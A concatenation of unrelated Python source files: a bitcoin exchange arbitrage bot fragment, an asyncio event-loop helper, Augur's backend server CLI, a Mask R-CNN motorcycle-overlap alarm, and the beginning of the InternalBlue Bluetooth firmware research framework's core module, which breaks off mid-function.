ask_price = (depths[self.exchange]["asks"][0]['price'])
bid_amount = int(depths[self.exchange]["bids"][0]['amount'])
ask_amount= int(depths[self.exchange]["asks"][0]['amount'])
hedger_bid_price = (depths[self.hedger]["bids"][0]['price'])
hedger_ask_price = (depths[self.hedger]["asks"][0]['price'])
hedger_bid_amount = (depths[self.hedger]["bids"][0]['amount'])
hedger_ask_amount = (depths[self.hedger]["asks"][0]['amount'])
except Exception as ex:
logging.warn("exception depths:%s" % ex)
traceback.print_exc()
return
if bid_price == 0 or ask_price == 0 or hedger_bid_price == 0 or hedger_ask_price == 0:
logging.info("exception ticker %s %s %s %s", bid_price ,ask_price,hedger_bid_price,hedger_ask_price)
return
# 并行程序一
# 当BTCC价格(BTCC买一)减去OKCOIN的价格(OKCOIN卖一)大于-2时,买X个OKCOIN现货(价格为卖一价+0.1元方便成交),
# 卖出X个BTCC现货(X数量为BTCC买一的数量)
# 并行程序二
# 当BTCC价格减去OKCOIN的价格小于-8时,卖Y个OKCOIN现货(买一价-0.1元),买入Y个BTCC现货 (Y数量为BTCC卖一的数量)
# -2 -8 0.1 这三个值将来为变量
# Update client balance
self.update_balance()
logging.info("maker:%s %s %s %s", bid_price, bid_amount, ask_price, ask_amount)
logging.info("hedger:%s %s %s %s", hedger_bid_price, hedger_bid_amount, hedger_ask_price, hedger_ask_amount)
logging.info("bid_price - hedger_ask_price=%0.2f", bid_price - hedger_ask_price)
logging.info("ask_price - hedger_bid_price=%0.2f", ask_price - hedger_bid_price)
current_time = time.time()
if current_time - self.last_trade < self.trade_wait:
logging.warn("Can't automate this trade, last trade " +
"occured %.2f seconds ago" %
(current_time - self.last_trade))
return
if bid_price - hedger_ask_price > -2:
hedge_amount = int(min(bid_amount, 1))
if hedge_amount < 1:
logging.warn("sell in btcc %s , buy in ok %s ..too small [%s]btc", bid_price, hedger_ask_price, hedge_amount)
return
btc_balance = int(self.clients[self.exchange].cny_balance/(bid_price-self.spread))
if btc_balance < hedge_amount:
logging.warn("btcc btc balance %s insufficent", btc_balance)
return
if self.clients[self.hedger].cny_balance < hedge_amount*(hedger_ask_price+self.spread):
logging.warn("okcoin cny balance %s insufficent", self.clients[self.hedger].cny_balance )
return
logging.info("sell in btcc %s , buy in ok %s [%s]btc", bid_price, hedger_ask_price, hedge_amount)
if not self.simluate:
self.new_order(self.exchange, 'sell', maker_only=False, amount=hedge_amount, price=bid_price-self.spread)
self.new_order(self.hedger, 'buy', maker_only=False, amount=hedge_amount, price=hedger_ask_price+self.spread)
self.last_trade = time.time()
elif ask_price - hedger_bid_price < -8 :
hedge_amount = int(min(ask_amount, 1))
if hedge_amount < 1:
logging.warn("sell in ok %s, buy in btcc %s ..insufficent [%s]btc", ask_price, hedger_bid_price, hedge_amount)
return
btc_balance = int(self.clients[self.exchange].cny_balance/(ask_price+self.spread))
if btc_balance < hedge_amount:
logging.warn("btcc cny balance %s insufficent", btc_balance)
return
if self.clients[self.hedger].btc_balance < hedge_amount:
logging.warn("okcoin btc balance %s insufficent", self.clients[self.hedger].btc_balance )
return
logging.info("sell in ok %s, buy in btcc %s [%s]btc", ask_price, hedger_bid_price, hedge_amount)
if not self.simluate:
self.new_order(self.exchange, 'buy', maker_only=False, amount=hedge_amount, price=ask_price+self.spread)
self.new_order(self.hedger, 'sell', maker_only=False, amount=hedge_amount, price=hedger_ask_price-self.spread)
self.last_trade = time.time()
def update_trade_history(self, time, price, cny, btc):
filename = self.out_dir + self.filename
need_header = False
if not os.path.exists(filename):
need_header = True
fp = open(filename, 'a+')
if need_header:
fp.write("timestamp, price, cny, btc\n")
fp.write(("%d") % time +','+("%.2f") % price+','+("%.2f") % cny+','+ str(("%.4f") % btc) +'\n')
fp.close()
def update_balance(self):
for kclient in self.clients:
self.clients[kclient].get_info()
def begin_opportunity_finder(self, depths):
self.hedgeALG1(depths)
def end_opportunity_finder(self):
pass
def opportunity(self, profit, volume, buyprice, kask, sellprice, kbid, perc, weighted_buyprice, weighted_sellprice):
pass
|
DynamicEventLoop.py
|
import asyncio
import threading
class DynamicEventLoop:
'''Creating a thread runs the event loop that can insert coroutine dynamically.
'''
def __init__(
self,
loop: asyncio.AbstractEventLoop = None,
thread: threading.Thread = None
):
'Define a loop and run it in a seperate thread'
# Creating Event Loop
if loop is not None:
self.loop = loop
else:
try:
self.loop = asyncio.get_event_loop()
except RuntimeError:
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
# Creating thread
if thread is not None:
self.thread = thread
else:
self.thread = threading.Thread(
target=lambda x: x.run_forever(),
args=(self.loop,)
)
self.taskList = {}
self.temp = [None, None]
def run(self):
'Starting Event Loop'
self.thread.start()
def append(self, mark, coroutine):
'''Returns the list of tasks
Append a coroutine to eventloop
mark can be **Anything**
coroutine should be a coroutine
'''
self.taskList.update(
{
mark: self.loop.create_task(coroutine)
}
)
# Send updated signal to loop
self.loop._csock.send(b'\0')
return self.taskList
def pop(self, mark):
'''Returns the result of the marked task
Delete the marked task in loop'''
try:
self.taskList.pop(mark).cancel() # Cancel the task
except KeyError:
return 'Incorrect Mark!'
|
backend.py
|
#SPDX-License-Identifier: MIT
"""
Augur library commands for controlling the backend components
"""
from copy import deepcopy
import os, time, atexit, subprocess, click, atexit, logging, sys
import psutil
import signal
import multiprocessing as mp
import gunicorn.app.base
from gunicorn.arbiter import Arbiter
from augur.cli import initialize_logging, pass_config, pass_application
from augur.housekeeper import Housekeeper
from augur.server import Server
from augur.application import Application
from augur.gunicorn import AugurGunicornApp
logger = logging.getLogger("augur")
@click.group('server', short_help='Commands for controlling the backend API server & data collection workers')
def cli():
pass
@cli.command("start")
@click.option("--disable-housekeeper", is_flag=True, default=False, help="Turns off the housekeeper")
@click.option("--skip-cleanup", is_flag=True, default=False, help="Disables the old process cleanup that runs before Augur starts")
@click.option("--logstash", is_flag=True, default=False, help="Runs logstash to collect errors from logs")
@click.option("--logstash-with-cleanup", is_flag=True, default=False, help="Runs logstash to collect errors from logs and cleans all previously collected errors")
def start(disable_housekeeper, skip_cleanup, logstash, logstash_with_cleanup):
"""
Start Augur's backend server
"""
augur_app = Application()
logger.info("Augur application initialized")
logger.info(f"Using config file: {augur_app.config.config_file_location}")
if not skip_cleanup:
logger.debug("Cleaning up old Augur processes...")
_broadcast_signal_to_processes()
time.sleep(2)
else:
logger.debug("Skipping process cleanup")
if logstash or logstash_with_cleanup:
augur_home = os.getenv('ROOT_AUGUR_DIRECTORY', "")
if logstash_with_cleanup:
print("Cleaning old workers errors...")
with open(augur_home + "/log_analysis/http/empty_index.html") as f:
lines = f.readlines()
with open(augur_home + "/log_analysis/http/index.html", "w") as f1:
f1.writelines(lines)
print("All previous workers errors got deleted.")
elasticsearch_path = os.getenv('ELASTIC_SEARCH_PATH', "/usr/local/bin/elasticsearch")
subprocess.Popen(elasticsearch_path)
logstash_path = os.getenv('LOGSTASH_PATH', "/usr/local/bin/logstash")
subprocess.Popen([logstash_path, "-f", augur_home + "/log_analysis/logstash-filter.conf"])
master = initialize_components(augur_app, disable_housekeeper)
logger.info('Starting Gunicorn webserver...')
logger.info(f'Augur is running at: http://127.0.0.1:{augur_app.config.get_value("Server", "port")}')
logger.info('Gunicorn server logs & errors will be written to logs/gunicorn.log')
logger.info('Housekeeper update process logs will now take over.')
Arbiter(master).run()
@cli.command('stop')
@initialize_logging
def stop():
"""
Sends SIGTERM to all Augur server & worker processes
"""
_broadcast_signal_to_processes(given_logger=logging.getLogger("augur.cli"))
@cli.command('kill')
@initialize_logging
def kill():
"""
Sends SIGKILL to all Augur server & worker processes
"""
_broadcast_signal_to_processes(signal=signal.SIGKILL, given_logger=logging.getLogger("augur.cli"))
@cli.command('export-env')
@pass_config
def export_env(config):
"""
Exports your GitHub key and database credentials
"""
export_file = open(os.getenv('AUGUR_EXPORT_FILE', 'augur_export_env.sh'), 'w+')
export_file.write('#!/bin/bash')
export_file.write('\n')
env_file = open(os.getenv('AUGUR_ENV_FILE', 'docker_env.txt'), 'w+')
for env_var in config.get_env_config().items():
if "LOG" not in env_var[0]:
logger.info(f"Exporting {env_var[0]}")
export_file.write('export ' + env_var[0] + '="' + str(env_var[1]) + '"\n')
env_file.write(env_var[0] + '=' + str(env_var[1]) + '\n')
export_file.close()
env_file.close()
@cli.command('repo-reset')
@pass_application
def repo_reset(augur_app):
"""
Refresh repo collection to force data collection
"""
augur_app.database.execute("UPDATE augur_data.repo SET repo_path = NULL, repo_name = NULL, repo_status = 'New'; TRUNCATE augur_data.commits CASCADE; ")
logger.info("Repos successfully reset")
@cli.command('processes')
@initialize_logging
def processes():
"""
Outputs the name/PID of all Augur server & worker processes"""
logger = logging.getLogger("augur.cli")
processes = get_augur_processes()
for process in processes:
logger.info(f"Found process {process.pid}")
def get_augur_processes():
processes = []
for process in psutil.process_iter(['cmdline', 'name', 'environ']):
if process.info['cmdline'] is not None and process.info['environ'] is not None:
try:
if os.getenv('VIRTUAL_ENV') in process.info['environ']['VIRTUAL_ENV'] and 'python' in ''.join(process.info['cmdline'][:]).lower():
if process.pid != os.getpid():
processes.append(process)
except KeyError:
pass
return processes
def _broadcast_signal_to_processes(signal=signal.SIGTERM, given_logger=None):
if given_logger is None:
_logger = logger
else:
_logger = given_logger
processes = get_augur_processes()
if processes != []:
for process in processes:
if process.pid != os.getpid():
logger.info(f"Stopping process {process.pid}")
try:
process.send_signal(signal)
except psutil.NoSuchProcess as e:
pass
def initialize_components(augur_app, disable_housekeeper):
master = None
manager = None
broker = None
housekeeper = None
worker_processes = []
mp.set_start_method('forkserver', force=True)
if not disable_housekeeper:
manager = mp.Manager()
broker = manager.dict()
housekeeper = Housekeeper(broker=broker, augur_app=augur_app)
controller = augur_app.config.get_section('Workers')
for worker in controller.keys():
if controller[worker]['switch']:
for i in range(controller[worker]['workers']):
logger.info("Booting {} #{}".format(worker, i + 1))
worker_process = mp.Process(target=worker_start, name=f"{worker}_{i}", kwargs={'worker_name': worker, 'instance_number': i, 'worker_port': controller[worker]['port']}, daemon=True)
worker_processes.append(worker_process)
worker_process.start()
augur_app.manager = manager
augur_app.broker = broker
augur_app.housekeeper = housekeeper
atexit._clear()
atexit.register(exit, augur_app, worker_processes, master)
return AugurGunicornApp(augur_app.gunicorn_options, augur_app=augur_app)
def worker_start(worker_name=None, instance_number=0, worker_port=None):
try:
time.sleep(30 * instance_number)
destination = subprocess.DEVNULL
process = subprocess.Popen("cd workers/{} && {}_start".format(worker_name,worker_name), shell=True, stdout=destination, stderr=subprocess.STDOUT)
logger.info("{} #{} booted.".format(worker_name,instance_number+1))
except KeyboardInterrupt as e:
pass
def exit(augur_app, worker_processes, master):
logger.info("Shutdown started for this Gunicorn worker...")
augur_app.shutdown()
if worker_processes:
for process in worker_processes:
logger.debug("Shutting down worker process with pid: {}...".format(process.pid))
process.terminate()
if master is not None:
logger.debug("Shutting down Gunicorn server")
master.halt()
logger.info("Shutdown complete")
sys.exit(0)
|
moto_alarm.py
|
import os
import cv2
import time, datetime
import mrcnn
import mrcnn.config
import mrcnn.utils
import queue
import threading
import numpy as np
import winsound
from mrcnn.model import MaskRCNN
from mrcnn import visualize
from pathlib import Path
VIDEO_SOURCE = "./assets/sample1.mp4" # put here URL to the video stream
###########################################################################################################################
# Configuration that will be used by the Mask-RCNN library
class MaskRCNNConfig(mrcnn.config.Config):
NAME = "coco_pretrained_model_config"
IMAGES_PER_GPU = 1
GPU_COUNT = 1
NUM_CLASSES = 1 + 80 # COCO dataset has 80 classes + one background class
DETECTION_MIN_CONFIDENCE = 0.6
###########################################################################################################################
# Bufferless VideoCapture
class VideoCapture:
def __init__(self, name):
self.cap = cv2.VideoCapture(name)
self.q = queue.Queue()
t = threading.Thread(target=self._reader)
t.daemon = True
t.start()
# Read frames as soon as they are available, keeping only most recent one
def _reader(self):
while True:
ret, frame = self.cap.read()
if not ret:
break
if not self.q.empty():
try:
self.q.get_nowait() # discard previous (unprocessed) frame
except queue.Empty:
pass
self.q.put(frame)
self.cap.release()
def read(self):
try:
return self.q.get(block=True, timeout=5)
except queue.Empty:
return None
###########################################################################################################################
def get_other_objects_boxes(boxes, class_ids):
object_boxes = []
for i, box in enumerate(boxes):
# If the detected object is motorcycle, skip it
if class_ids[i]!=4:
object_boxes.append(box)
return np.array(object_boxes)
def get_motorcycle_boxes(boxes, class_ids, scores):
motorcycle_boxes = []
for i, box in enumerate(boxes):
# If the detected object isn't a motorcycle, skip it
if class_ids[i]==4 and scores[i]>0.9:
motorcycle_boxes.append(box)
return np.array(motorcycle_boxes)
###########################################################################################################################
# Root directory of the project
ROOT_DIR = Path(".")
# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# Directory to save images
IMAGES_DIR = os.path.join(ROOT_DIR, "images")
# Local path to trained weights file
COCO_MODEL_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5")
# Download COCO trained weights from Releases if needed
if not os.path.exists(COCO_MODEL_PATH):
mrcnn.utils.download_trained_weights(COCO_MODEL_PATH)
# Create folder for images
if not os.path.exists(IMAGES_DIR):
os.mkdir(IMAGES_DIR)
# Create a Mask-RCNN model in inference mode
model = MaskRCNN(mode="inference", model_dir=MODEL_DIR, config=MaskRCNNConfig())
# Load pre-trained model
model.load_weights(COCO_MODEL_PATH, by_name=True)
# Load the video file we want to run detection on
video_capture = VideoCapture(VIDEO_SOURCE)
# Loop over each frame of video
# counter = 0
while True:
frame = video_capture.read()
if frame is None:
break
# Crop the image
# x = frame.shape[0]-800
# y = frame.shape[1]-800
# frame = frame[x:-1, y:-1]
# Convert the image from BGR color (which OpenCV uses) to RGB color
rgb_image = frame[:, :, ::-1]
# Run the image through the Mask R-CNN model to get results.
results = model.detect([rgb_image], verbose=0)
# Mask R-CNN assumes we are running detection on multiple images.
# We only passed in one image to detect, so only grab the first result.
r = results[0]
# The r variable will now have the results of detection:
# - r['rois'] are the bounding box of each detected object
# - r['class_ids'] are the class id (type) of each detected object
# - r['scores'] are the confidence scores for each detection
# - r['masks'] are the object masks for each detected object (which gives you the object outline)
# Get boxes of all detected motorcycles
motorcycle_boxes = get_motorcycle_boxes(r['rois'], r['class_ids'], r['scores'])
print("Motorcycles detected: ", len(motorcycle_boxes))
# Get boxes of all other objects
other_objects_boxes = get_other_objects_boxes(r['rois'], r['class_ids'])
print("Other objects detected: ", len(other_objects_boxes))
# Draw green rectangles around motorcycles
for box in motorcycle_boxes:
y1, x1, y2, x2 = box
cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0), 1)
# Draw red rectangles around other objects
for box in other_objects_boxes:
y1, x1, y2, x2 = box
cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 0, 255), 1)
# See how much those objects overlap with the motorcycles
overlaps = mrcnn.utils.compute_overlaps(motorcycle_boxes, other_objects_boxes)
# Assume no overlaps with motorcyles
is_overlap_detected = False
for overlap in overlaps:
# For this motorcycle, find the max amount it was covered by any
# other objects that was detected in our image
max_IoU_overlap = np.max(overlap)
print("Max overlap: ", max_IoU_overlap)
if max_IoU_overlap > 0.2:
is_overlap_detected = True
print("Is overlap detected: ", is_overlap_detected)
# If overlap is detected save the frame to the file and beep (Windows)
if is_overlap_detected:
filename = datetime.datetime.now().strftime('%G-%m-%d_%H-%M-%S_overlap.jpg')
cv2.imwrite(os.path.join(IMAGES_DIR, filename), frame)
winsound.Beep(2500, 1000)
# Uncomment the lines below to see the result in real time
# cv2.imshow('frame', frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
cv2.destroyAllWindows()
|
core.py
|
#!/usr/bin/env python2
# core.py
#
# This file contains the main class of the framework which
# includes the thread functions for the receive and send thread.
# It also implements methods to setup the TCP connection to the
# Android Bluetooth stack via ADB port forwarding
#
# Copyright (c) 2020 The InternalBlue Team. (MIT License)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
from __future__ import division
import datetime
import logging
import queue as queue2k
import socket
import struct
import time
from abc import ABCMeta, abstractmethod
from builtins import hex, str, range, object
from threading import Thread
from future import standard_library
from future.utils import with_metaclass
from past.utils import old_div
from . import hci
from .fw import FirmwareDefinition
from .fw.fw import Firmware
from .hci import HCI, HCI_COMND
from .objects.connection_information import ConnectionInformation
from .objects.queue_element import QueueElement
from .utils import flat, bytes_to_hex
from .utils.packing import p8, p16, u16, p32, u32, bits, unbits
from .utils.internalblue_logger import getInternalBlueLogger
standard_library.install_aliases()
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple, Union, NewType, Callable, cast
from internalblue import (Address, Record, Task, HCI_CMD, FilterFunction, ConnectionNumber, ConnectionDict,
ConnectionIndex, BluetoothAddress, HeapInformation, QueueInformation, Opcode)
from . import DeviceTuple
except ImportError:
pass
try:
import pwnlib
from pwnlib import context
from pwnlib.asm import disasm, asm
from pwnlib.exception import PwnlibException
context.context.arch = 'thumb'
except ImportError:
pwnlib = context = disasm = asm = PwnlibException = None
_has_pwnlib = False
import warnings
warnings.formatwarning = (lambda x, *args, **kwargs: f"\x1b[31m[!] {x}\x1b[0m\n")
warnings.warn("pwnlib is not installed. Some features will not work.")
else:
_has_pwnlib = True
def needs_pwnlib(func):
def inner(*args, **kwargs):
if not _has_pwnlib:
raise ImportError("pwnlib is required for this function.")
return func(*args, **kwargs)
return inner
class InternalBlue(with_metaclass(ABCMeta, object)):
@property
def log_level(self):
return self._internal_loglevel
@log_level.setter
def log_level(self, new):
levels = {"CRITICAL": logging.CRITICAL, "ERROR": logging.ERROR,
"WARNING": logging.WARNING, "INFO": logging.INFO,
"DEBUG": logging.DEBUG, "NOTSET": logging.NOTSET,
"WARN": logging.WARN}
new = new.upper()
self._internal_loglevel = new
level = levels[new]
if self.logger.hasHandlers() and level is not None:
self.logger.setLevel(level)
if len(self.logger.handlers) > 0:
self.logger.handlers[0].setLevel(level)
def __init__(
self,
queue_size: int = 1000,
btsnooplog_filename: str = "btsnoop.log",
log_level: str = "info",
data_directory: str = ".",
replay: bool = False,
) -> None:
# get and store 'InternalBlue' logger
self.logger = getInternalBlueLogger()
self.interface = None # holds the self.device / hci interface which is used to connect, is set in cli
self.fw: FirmwareDefinition = None # holds the firmware file
self.data_directory = data_directory
self.s_inject = (
None
) # type: socket.socket # This is the TCP socket to the HCI inject port
self.s_snoop = (
None
) # type: socket.socket # This is the TCP socket to the HCI snoop port
# If btsnooplog_filename is set, write all incomming HCI packets to a file (can be viewed in wireshark for debugging)
if btsnooplog_filename is not None:
self.write_btsnooplog = True
self.btsnooplog_file = open(
self.data_directory + "/" + btsnooplog_filename, "wb"
)
else:
self.write_btsnooplog = False
# The sendQueue connects the core framework to the sendThread. With the
# function sendH4 or sendHciCommand, the core framework (or a CLI command / user script)
# can put an H4 packet or HCI Command into this queue. The queue entry should be a tuple:
# (h4type, data, response_queue, response_hci_filter_function)
# - h4type: The H4 packet type (e.g. 1 for HCI Command or 7 for Broadcom Diagnostic)
# - data: The H4 payload (byte string)
# - response_queue: queue that is used for delivering the H4 response
# back to the entity that put the H4 command into the
# sendQueue. May be None if no response is expected/needed.
# If a response_queue is specified, it is also necessary to
# specify a response_hci_filter_function.
# - response_hci_filter_function: An hci callback function (see registerHciCallback())
# that is used to test whether incomming H4 packets are the
# response to the packet that was sent. May be None if response_queue
# is also None.
# The sendThread polls the queue, gets the above mentioned tuple, sends the
# H4 command to the firmware and then waits for the response from the
# firmware (the response is recognized with the help of the filter function).
# Once the response arrived, it puts the response into the response_queue from
# the tuple. See sendH4() and sendHciCommand().
self.sendQueue = queue2k.Queue(queue_size) # type: queue2k.Queue[Task]
self.recvThread: Optional[
Thread
] = None # The thread which is responsible for the HCI snoop socket
self.sendThread: Optional[
Thread
] = None # The thread which is responsible for the HCI inject socket
self.tracepoints = [] # A list of currently active tracepoints
# The list contains tuples:
# [0] target address
# [1] address of the hook code
self.tracepoint_registers: Optional[
List[int]
] = None # Last captured register values from a tracepoint
self.tracepoint_memdump_parts = {} # Last captured RAM dump from a tracepoint
self.tracepoint_memdump_address = None # Start address of the RAM dump
# The registeredHciCallbacks list holds callback functions which are being called by the
# recvThread once a HCI Event is being received. Use registerHciCallback() for registering
# a new callback (put it in the list) and unregisterHciCallback() for removing it again.
self.registeredHciCallbacks = []
# The registeredHciRecvQueues list holds queues which are being filled by the
# recvThread once a HCI Event is being received. Use registerHciRecvQueue() for registering
# a new queue (put it in the list) and unregisterHciRecvQueue() for removing it again.
# Actually the registeredHciRecvQueues holds tuples with the format: (queue, filter_function)
# filter_function will be called for each packet that is received and only if it returns
# True, the packet will be put into the queue. The filter_function can be None in order
# to put all packets into the queue.
self.registeredHciRecvQueues = (
[]
) # type: List[Tuple[queue2k.Queue[Record], FilterFunction]]
self.exit_requested = False # Will be set to true when the framework wants to shut down (e.g. on error or user exit)
self.running = False # 'running' is True once the connection to the HCI sockets is established
# and the recvThread and sendThread are started (see connect() and shutdown())
self.log_level = log_level
if _has_pwnlib:
self.check_binutils() # Check if ARM binutils are installed (needed for asm() and disasm())
# If fix_binutils is True, the function tries to fix the error were
# the binutils are installed but not found by pwntools (e.g. under Arch Linux)
self.stackDumpReceiver = None # This class will monitor the HCI Events and detect stack trace events.
# Register callbacks which handle specific HCI Events:
self.registerHciCallback(self.connectionStatusCallback)
self.registerHciCallback(self.coexStatusCallback)
self.registerHciCallback(self.readMemoryPoolStatisticsCallback)
# If the --replay flag was used and a chip is spoofed.
self.replay = replay
@needs_pwnlib
def check_binutils(self, fix=True):
"""
Test if ARM binutils is in path so that asm and disasm (provided by
pwntools) work correctly.
It may happen, that ARM binutils are installed but not found by pwntools.
If 'fix' is True, check_binutils will try to fix this.
"""
saved_loglevel = self.log_level
context.log_level = "critical"
try:
pwnlib.asm.which_binutils(
"as"
) # throws PwnlibException if as cannot be found
self.log_level = saved_loglevel
return True
except PwnlibException:
self.log_level = saved_loglevel
self.logger.debug("pwnlib.asm.which_binutils() cannot find 'as'!")
if not fix:
return False
# Work around for arch (with installed arm-none-eabi-binutils)
import os
from glob import glob
def which_binutils_fixed(tool):
pattern = "arm-*-%s" % tool
for directory in os.environ["PATH"].split(":"):
res = sorted(glob(os.path.join(directory, pattern)))
if res:
return res[0]
raise PwnlibException("Could not find tool %s." % tool)
try:
which_binutils_fixed("as")
# yeay it worked! fix it in pwnlib:
pwnlib.asm.which_binutils = which_binutils_fixed
self.logger.debug("installing workaround for pwnlib.asm.which_binutils() ...")
return True
except PwnlibException:
self.logger.warning(
"pwntools cannot find binutils for arm architecture. Disassembling will not work!"
)
return False
def _parse_time(self, timeParam):
# type: (Any) -> datetime.datetime
"""
Taken from: https://github.com/joekickass/python-btsnoop
Record time is a 64-bit signed integer representing the time of packet arrival,
in microseconds since midnight, January 1st, 0 AD nominal Gregorian.
In order to avoid leap-day ambiguity in calculations, note that an equivalent
epoch may be used of midnight, January 1st 2000 AD, which is represented in
this field as 0x00E03AB44A676000.
"""
time_betw_0_and_2000_ad = int("0x00E03AB44A676000", 16)
time_since_2000_epoch = datetime.timedelta(
microseconds=timeParam
) - datetime.timedelta(microseconds=time_betw_0_and_2000_ad)
return datetime.datetime(2000, 1, 1) + time_since_2000_epoch
@abstractmethod
def _recvThreadFunc(self):
# type: () -> None
pass
def _sendThreadFunc(self):
# type: () -> None
"""
This is the run-function of the sendThread. It polls the sendQueue for new 'send tasks'
and executes them (sends H4 commands to the chip and returns the response).
The entries of the sendQueue are tuples representing a 'send task':
(h4type, payload, response_queue)
- h4type: The H4 type (8 bit integer) to send
- data: The H4 payload (byte string) to send
- response_queue: queue that is used for delivering the H4 response
back to the entity that put the H4 command into the
sendQueue.
Use sendHciCommand() to put 'send tasks' into the sendQueue!
The thread stops when exit_requested is set to True.
"""
self.logger.debug("Send Thread started.")
while not self.exit_requested:
# Wait for 'send task' in send queue
try:
task = self.sendQueue.get(timeout=0.5)
except queue2k.Empty:
continue
# Extract the components of the task
try:
h4type, data, queue, filter_function = task
except ValueError:
# might happen if H4 is not supported
self.logger.debug("Failed to unpack queue item.")
continue
# Special handling of ADBCore and HCICore
# ADBCore: adb transport requires to prepend the H4 data with its length
# HCICore: need to manually save the data to btsnoop log as it is not
# reflected to us as with adb
if self.__class__.__name__ == "ADBCore":
# prepend with total length for H4 over adb with modified Bluetooth module
if not self.serial:
data = p16(len(data)) + data
# If we do not have a patched module, we write to the serial using the same socket.
# Echoing HCI commands to the serial interface has the following syntax:
#
# echo -ne "\x01\x4c\xfc\x05\x33\x22\x11\x00\xaa"
# 0x01: HCI command
# 0xfc4c: Write RAM
# 0x05: Parameter length
# 0x3322...: Parameters
#
# ...and that's how the data is formatted already anyway
elif self.__class__.__name__ == "HCICore":
if self.write_btsnooplog:
# btsnoop record header data:
btsnoop_data = p8(h4type) + data
btsnoop_orig_len = len(btsnoop_data)
btsnoop_inc_len = len(btsnoop_data)
btsnoop_flags = 0
btsnoop_drops = 0
btsnoop_time = datetime.datetime.now()
btsnoop_record_hdr = struct.pack(
">IIIIq",
btsnoop_orig_len,
btsnoop_inc_len,
btsnoop_flags,
btsnoop_drops,
self._btsnoop_pack_time(btsnoop_time),
)
with self.btsnooplog_file_lock:
self.btsnooplog_file.write(btsnoop_record_hdr)
self.btsnooplog_file.write(btsnoop_data)
self.btsnooplog_file.flush()
# Prepend UART TYPE and length.
out = p8(h4type) + data
# if the caller expects a response: register a queue to receive the response
if queue is not None and filter_function is not None:
recvQueue = queue2k.Queue(1)
self.registerHciRecvQueue(recvQueue, filter_function)
# Send command to the chip using s_inject socket
try:
self.logger.debug("_sendThreadFunc: Send: " + bytes_to_hex(out))
self.s_inject.send(out)
except socket.error:
# TODO: For some reason this was required for proper save and replay, so this should be handled globally somehow. Or by implementing proper testing instead of the save/replay hack
pass
except socket.error as e:
self.logger.warning(
"_sendThreadFunc: Sending to socket failed with {}, reestablishing connection.\nWith HCI sockets, some HCI commands require root!".format(
e
)
)
# socket are terminated by hcicore..
self._teardownSockets()
self._setupSockets()
# if the caller expects a response:
# Wait for the HCI event response by polling the recvQueue
if queue is not None and filter_function is not None:
try:
record = recvQueue.get(timeout=2)
hcipkt = record[0]
data = hcipkt.data
except queue2k.Empty:
self.logger.warning("_sendThreadFunc: No response from the firmware.")
data = None
self.unregisterHciRecvQueue(recvQueue)
continue
queue.put(data)
self.unregisterHciRecvQueue(recvQueue)
self.logger.debug("Send Thread terminated.")
def _tracepointHciCallbackFunction(self, record):
# type: (Record) -> None
hcipkt = record[0] # get HCI Event packet
timestamp = record[5] # get timestamp
# Check if event contains a tracepoint packet
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
if hcipkt.event_code != 0xFF: # must be custom event (0xff)
return
if hcipkt.data[0:6] == "TRACE_": # My custom header (see hook code)
data = hcipkt.data[6:]
tracepoint_registers = [u32(data[i: i + 4]) for i in range(0, 68, 4)]
pc = tracepoint_registers[0]
registers = "pc: 0x%08x lr: 0x%08x sp: 0x%08x cpsr: 0x%08x\n" % (
pc,
tracepoint_registers[16],
tracepoint_registers[1],
tracepoint_registers[2],
)
registers += (
"r0: 0x%08x r1: 0x%08x r2: 0x%08x r3: 0x%08x r4: 0x%08x\n"
% tuple(tracepoint_registers[3:8])
)
registers += (
"r5: 0x%08x r6: 0x%08x r7: 0x%08x r8: 0x%08x r9: 0x%08x\n"
% tuple(tracepoint_registers[8:13])
)
registers += "r10: 0x%08x r11: 0x%08x r12: 0x%08x\n" % tuple(
tracepoint_registers[13:16]
)
self.logger.info("Tracepoint 0x%x was hit and deactivated:\n" % pc + registers)
filename = (
self.data_directory
+ "/"
+ "internalblue_tracepoint_registers_%s.bin"
% datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
)
self.logger.info("Captured Registers for Tracepoint to %s" % filename)
f = open(filename, "w")
f.write(registers)
f.close()
self.tracepoint_registers = tracepoint_registers
# remove tracepoint from self.tracepoints
for tp in self.tracepoints:
if tp[0] == pc:
self.tracepoints.remove(tp)
break
# reset all RAM dump related variables:
self.tracepoint_memdump_address = None
self.tracepoint_memdump_parts = {}
elif hcipkt.data[0:6] == "RAM___": # My custom header (see hook code)
dump_address = u32(hcipkt.data[6:10])
data = hcipkt.data[10:]
if self.tracepoint_memdump_address is None:
self.tracepoint_memdump_address = dump_address
normalized_address = dump_address - self.tracepoint_memdump_address
self.tracepoint_memdump_parts[normalized_address] = data
# Check if this was the last packet
if (
len(self.tracepoint_memdump_parts)
== self.fw.TRACEPOINT_RAM_DUMP_PKT_COUNT
):
dump = flat(self.tracepoint_memdump_parts)
# TODO: use this to start qemu
filename = (
self.data_directory
+ "/"
+ "internalblue_tracepoint_0x%x_%s.bin"
% (
self.tracepoint_memdump_address,
datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S"),
)
)
self.logger.info(
"Captured Ram Dump for Tracepoint 0x%x to %s"
% (self.tracepoint_memdump_address, filename)
)
f = open(filename, "wb")
f.write(dump)
f.close()
@needs_pwnlib
def addTracepoint(self, address):
# type: (Address) -> bool
# Check if constants are defined in fw.py
for const in [
"TRACEPOINT_BODY_ASM_LOCATION",
"TRACEPOINT_BODY_ASM_SNIPPET",
"TRACEPOINT_HOOK_ASM",
"TRACEPOINT_HOOKS_LOCATION",
